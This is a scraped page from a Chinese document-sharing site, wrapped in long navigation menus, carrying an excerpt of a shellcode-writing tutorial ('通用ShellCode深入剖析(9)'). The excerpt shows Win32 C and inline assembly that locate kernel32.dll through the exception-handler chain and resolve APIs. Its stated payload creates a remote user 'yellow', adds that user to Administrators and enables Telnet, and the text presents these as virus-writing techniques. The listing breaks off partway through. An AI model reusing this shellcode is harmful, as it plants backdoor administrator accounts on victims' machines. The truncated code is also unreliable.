通用ShellCode深入剖析(9)_学科文库

范文: 工作总结; 工作计划; 工作报告; 心得体会; 论文大全; 名言句子; 文秘资料; 公文资料; 稿件大全; 评语大全; 祝福语大全; 观后感大全; 读后感大全; 节日庆典大全; 入团入党申请书; 经典范文大全

美文: 经典美文; 情感美文; 爱情美文; 哲理美文; 优美句子; 散文诗歌; 微小说; 签名说说; 经典语录; 语句摘抄; 励志故事; 日记随笔

作文: 小学生作文; 初中作文; 高中作文; 考试优秀作文

文库: 幼儿教育; 小学教育; 初中教育; 教学研究; 专业资料; 资格考试; 教育文库; 外语考试; 求职职场; 高等教育; 高中教育; 实用文档

题库: 小学语文; 小学数学; 小学英语; 阅读理解; 初中语文; 初中数学; 初中英语; 初中物理; 初中化学; 初中生物; 初中历史; 初中地理; 高中语文; 高中数学; 高中英语; 高中物理; 高中化学; 高中生物; 高中历史; 高中地理

幼儿教育: 幼儿读物; 少儿英语; 唐诗宋词; 育儿理论经验; 育儿知识; 家庭教育

小学教育: 小学作文; 小升初; 学科竞赛; 其它课程

初中教育: 初中作文; 中考; 科学; 学科竞赛; 其它课程

高中教育: 高中作文; 高考; 学科竞赛; 其它课程

职业教育: 中职中专; 职高对口; 职业技术培训; 其他

成人教育: 成人考试; 电大; 自考; 专升本; 远程、网络教育

高等教育: 理学; 工学; 经济学; 管理学; 文学; 哲学; 历史学; 法学; 教育学; 农业; 医学; 军事; 艺术; 研究生入学考试; 院校资料; 其它

资格考试: 公务员考试; 司法考试; IT认证; 财会/金融考试; 从业资格考试; 交规考试; 其它考试

求职/职场: 简历封面/模板; 求职/面试; 职业规划; 自我管理与提升

计划/解决方案: 学习计划; 工作计划; 解决方案; 商业计划; 营销/活动策划

总结/汇报: 学习总结; 实习总结; 工作总结/汇报

党团工作: 入党/转正申请; 思想汇报/心得体会; 党团建设

工作范文: 制度/规范; 演讲/主持; 行政公文

表格/模板: 合同协议; 书信模板; 表格类模板

人文社科: 广告/传媒; 设计/艺术; 教育学/心理学; 社会学; 文化/宗教; 哲学/历史; 文学研究

经管营销: 人力资源管理; 财务管理; 生产/经营管理; 企业管理; 公共/行政管理; 销售/营销; 金融/投资; 经济/市场

工程科技: 信息与通信; 电子/电路; 建筑/土木; 城乡/园林规划; 环境/食品科学; 电力/水利; 交通运输; 能源/化工; 机械/仪表; 冶金/矿山/地质; 纺织/轻工业; 材料科学; 兵器/核科学

IT/计算机: 互联网; 电脑基础知识; 软件及应用; 硬件及网络

自然科学: 数学; 物理; 化学; 生物学; 天文/地理

医药卫生: 临床医学; 基础医学; 预防医学; 中医中药; 药学

农林牧渔: 农学; 林学; 畜牧兽医; 水产渔业

通用ShellCode深入剖析(9)

发布时间：2021-06-05

址
jmp FindMZ
Found:
pop ecx
pop esi
ret
}
}

void main(void)
{
printf("%0.8X\n",GetKernel32());
getch();
}
完成了本节的学习以后,你应该掌握常用于编写病毒和ShellCode的几种技术:
1,根据PE文件查找引出函数地址
2,动态计算KERNEL32.DLL的基址
3,动态装载需要的运行库及动获得需要的Windows API(s)
在最后一节里我们将对前面所分析的技术做一个综合应用,写一个简单的ShellCode

三,综合运用

本节我们将综合前面分析的技术编写一个简单的通用ShellCode,这个ShellCode将首先在远程机器上新建一个用户,用户名yellow,密码yellow,如果如果可能将把该用户加入Administrators用户组,如果可能还会打开Telnet服务,请留意我的编码风格,这样风格对以后的ShellCode功能扩充提供很大方便.源程序如下:
////////////////////////////////////////////////////////////
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winsock.h>
//定义API及DLL名称及其存储顺序,良好的编码风格对于以后的开发会提供很大的方便
#define APISTART 0
#define GETPROCADDRESS(APISTART+0)
#define LOADLIBRARY(APISTART+1)
#define EXITPROCESS(APISTART+2)
#define WINEXEC(APISTART+3)
#define KNLSTART(EXITPROCESS)
#define KNLEND(WINEXEC)
#define NKNLAPI(4)

#define WSOCKSTART(KNLEND+1)
#define SOCKET(WSOCKSTART+0)
#define BIND(WSOCKSTART+1)
#define CONNECT(WSOCKSTART+2)
#define ACCEPT(WSOCKSTART+3)
#define LISTEN(WSOCKSTART+4)
#define SEND(WSOCKSTART+5)
#define RECV(WSOCKSTART+6)
#define CLOSESOCKET(WSOCKSTART+7)
#define WSASTARTUP(WSOCKSTART+8)
#define WSACLEANUP(WSOCKSTART+9)
#define WSOCKEND(WSACLEANUP)
#define NWSOCKAPI(10)
//define NETAPI,RPCAPI......
#define NAPIS (NKNLAPI+NWSOCKAPI/*+NNETAPI+NRPCAPI+.......*/)

#define DLLSTART 0
#define KERNELDLL(DLLSTART+0)
#define WS2_32DLL(DLLSTART+1)
#define DLLEND (WS2_32DLL)
#define NDLLS2

#define COMMAND_START 0
#define COMMAND_ADDUSER (COMMAND_START+0)
#define COMMAND_SETUSERADMIN(COMMAND_START+1)
#define COMMAND_OPENTLNT (COMMAND_START+2)
#define COMMAND_END (COMMAND_OPENTLNT)
#define NCMD3
void ShellCodeFun(void)
{
DWORD ImageBase,IED,FunNameArray,PE,Count,flen,DLLS[NDLLS];
int i;
char *FuncName,*APINAMES[NAPIS],*DLLNAMES[NDLLS],*CMD[NCMD];
FARPROC API[NAPIS];
__asm
{//1,手工获得KERNEL32.DLL基址,并获得LoadLibraryA和GetProcAddress函数地址
push esi
push ecx
mov esi,fs:0
lodsd
GetExeceptionFilter:
cmp [eax],0xffffffff
je GetedExeceptionFilter
mov eax,[eax]
jmp GetExeceptionFilter
GetedExeceptionFilter:
mov eax, [eax+4]
FindMZ:
and eax,0xffff0000
cmp word ptr [eax],'ZM'
jne MoveUp
mov ecx,[eax+0x3c]
add ecx,eax
cmp word ptr [ecx],'EP'
je FoundKNL
MoveUp:
dec eax
jmp FindMZ
FoundKNL:
pop ecx
pop esi
mov
DLLS[KERNELDLL* type DWORD],eax
mov ImageBase,eax
call LGETPROCADDRESS
_emit 'G';
_emit 'e';
_emit 't';
_emit 'P';
_

上一篇：企业战略管理第6章

下一篇：迎元旦法制故事比赛活动方案

精彩图片

猜你喜欢

热门精选

经典双语美文：加油为了心中的梦想

美文赏析：花开向暖，素锦留香

经典美文：花开向暖，素锦留香

经典美文：青春如歌，携一份懂得同行

在雨中静听自己的心跳美文

浅谈当今大学教育的含金量双语美文

大家正在看

西方行政学理论概要 2011影视营销部新人培训机制[1]. 公共关系理论与实务(罗志祥)考试黄磷下游产品复杂性理论视角下的战略人力资源推拉型电磁铁性能测试台设计第13章国家预算和预算管理体制会计证年检